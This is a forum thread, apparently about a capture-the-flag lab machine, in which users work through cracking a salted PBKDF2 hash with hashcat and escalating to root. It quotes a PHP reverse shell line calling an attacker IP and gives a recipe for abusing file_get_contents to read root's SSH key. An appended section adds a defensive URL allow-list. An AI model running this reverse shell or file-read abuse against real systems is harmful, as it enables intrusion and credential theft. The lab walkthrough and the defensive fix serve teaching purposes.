Posts: 12 Threads: 0 Joined: N/A
August 21, 2022 at 9:10 PM
someone help me to break the hash?, I have the passwd and salt but I can't break it maybe my format is wrong

Posts: 16 Threads: 0 Joined: N/A
August 21, 2022 at 9:10 PM
(August 21, 2022, 08:51 PM)echo133t Wrote: I found that root is running
/bin/bash -c cd /var/www/html && php artisan schedule:run >> /dev/null 2>&1
if we could add this to the file artisan ... but the owner is www-data
$sock=fsockopen("10.10.14.xx", 443); exec("/bin/sh -i <&3 >&3 2>&3");
I haven't found anything else yet

There's another thing that root runs every once in a while that has to do with the first vulnerability

Posts: 43 Threads: 0 Joined: N/A
August 21, 2022 at 9:13 PM
(August 21, 2022, 07:21 PM)orwell1984 Wrote: (August 21, 2022, 06:49 PM)echo133t Wrote: (August 21, 2022, 05:13 PM)orwell1984 Wrote: Yeah, you need a salt, you can get it the same way you got the password. Then you have to format it right to be able to crack it with hashcat.
Hell, I'm using this:
hashcat -m 10900 --force hash.txt rockyou.txt
hash.txt format:
sha256:10000:<Base64(salt)>:<Base64(passwd)>
password format:
perl -e 'print pack ("H*","password here")' | base64
salt format:
echo user_salt | base64
and I didn't find anything in rockyou.txt, my hash has the wrong format?
That looks good to me... Send me a DM with the salt and the password to check if everything is ok

Same, can't crack hash w this format

Posts: 16 Threads: 0 Joined: N/A
August 21, 2022 at 9:21 PM
(August 21, 2022, 09:13 PM)lollole Wrote: Same, can't crack hash w this format

Open private, let me check if everything is ok.

Posts: 43 Threads: 0 Joined: N/A
August 21, 2022 at 9:38 PM
(August 21, 2022, 09:21 PM)orwell1984 Wrote: Open private, let me check if everything is ok.

Fixed it, trying to find root part but no clue...

Posts: 16 Threads: 0 Joined: N/A
August 21, 2022 at 9:40 PM
(August 21, 2022, 09:38 PM)lollole Wrote: Fixed it, trying to find root part but no clue...

For privesc use pspy

Posts: 43 Threads: 0 Joined: N/A
August 21, 2022 at 9:51 PM
(August 21, 2022, 09:40 PM)orwell1984 Wrote: For privesc use pspy

ofc I already used that but still can't find anything, could u pm?

Posts: 4 Threads: 0 Joined: N/A
August 21, 2022 at 10:13 PM
still no clue, how can u find it?

Posts: 74 Threads: 0 Joined: N/A
August 21, 2022 at 10:20 PM
For the root part:
With pspy you will see that it runs the laravel scheduled tasks as root and clears the tasks table every minute:
/bin/bash -c cd /var/www/html && php artisan schedule:run >> /dev/null 2>&1
mysql laravel --execute TRUNCATE tasks
First get the mysql creds from env and log in to the db.
Checking the app/Console/Kernel.php you will see that it runs the HealthChecker::check function from app/Http/Controllers/HealthChecker.php on the tasks from db.
And in that function we can abuse the "$res = @file_get_contents($monitoredUrl, false)" to read files.
So, from the webapp just create a task.
From the database change the monitoredUrl to any file you want to read like:
update tasks set monitoredUrl='file:///root/.ssh/id_rsa';
And on the webhookUrl, you will get the contents of the file.
Note: If you are getting the id_rsa don't forget to correctly get rid of the backslashes.

Posts: 51 Threads: 0 Joined: N/A
August 22, 2022 at 3:34 AM
(August 21, 2022, 09:10 PM)hackthebaaax Wrote: someone help me to break the hash?, I have the passwd and salt but I can't break it maybe my format is wrong

Have you cracked the hash?
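
The root-part post above works because the stored monitoredUrl is handed to file_get_contents() without being re-checked after the row was changed in the database. As an added example (not code from the application or from any poster; isFetchableUrl() and safeFetch() are hypothetical names), this is a scheme allow-list applied at fetch time rather than only when the task is created:

```php
<?php
declare(strict_types=1);

// Added example: validate the URL where it is used, because the value
// read back from the tasks table may differ from what the form accepted.
const ALLOWED_SCHEMES = ['http', 'https'];

function isFetchableUrl(string $url): bool
{
    $parts = parse_url($url);
    // file:///path parses with a scheme but no host; bare paths have neither.
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    return in_array(strtolower($parts['scheme']), ALLOWED_SCHEMES, true);
}

function safeFetch(string $url): ?string
{
    if (!isFetchableUrl($url)) {
        return null; // refuse instead of passing the value to a stream wrapper
    }
    // Do not follow redirects automatically; bound the wait time.
    $ctx = stream_context_create([
        'http' => ['follow_location' => 0, 'timeout' => 5],
    ]);
    $body = file_get_contents($url, false, $ctx);
    return $body === false ? null : $body;
}

// Constructed sample values, as they might be read back from the database.
$samples = [
    'https://status.example.test/health',
    'HTTP://status.example.test/',
    'file:///root/.ssh/id_rsa',   // the value used in the post above
    '/var/www/html/.env',         // bare path, no scheme
];
foreach ($samples as $u) {
    printf("%-40s %s\n", $u, isFetchableUrl($u) ? 'allowed' : 'rejected');
}
```

The allow-list only restricts the scheme. Running the scheduled job as an unprivileged user instead of root would also limit what any remaining file read could reach.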